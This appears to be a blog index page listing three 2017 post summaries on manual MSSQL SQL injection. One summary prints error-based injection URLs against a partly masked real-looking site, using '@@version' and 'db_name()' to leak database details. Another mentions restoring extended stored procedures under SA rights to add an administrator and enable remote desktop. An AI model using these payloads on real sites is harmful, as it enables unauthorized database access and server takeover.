mssql手工注入2
摘要:
对于这种注入, 如果能用工具, 就用工具, 因为特别的麻烦 阅读全文
posted @ 2017-05-10 14:49 Perl6 阅读(126) 评论(0) 推荐(0) 编辑
mssql手工注入1
摘要:
强制字符转成数字, 所以报错, 能获得数据 查版本号: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version=1-- 查数据库版本: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and db_name()=1-- 查当前数据库用户(如果看到dbo 那么多... 阅读全文
posted @ 2017-05-10 14:28 Perl6 阅读(306) 评论(0) 推荐(0) 编辑
mssql注入中的储存用法删除与恢复
摘要:
删除: 恢复: 对于mssql SA权限的注入, 最简单的运行方法可以用如下方法测试: 在注入方面, 如果要恢复, 可以这样: 或者: 在注入添恢复扩展后, 用如下方式可添加管理员与添加3389: #上面第四条语句, 是dos下的注删表操作, 关于开3389与查看3389窗口, 可查看如下链接: # 阅读全文
posted @ 2017-05-10 13:38 Perl6 阅读(350) 评论(0) 推荐(0) 编辑
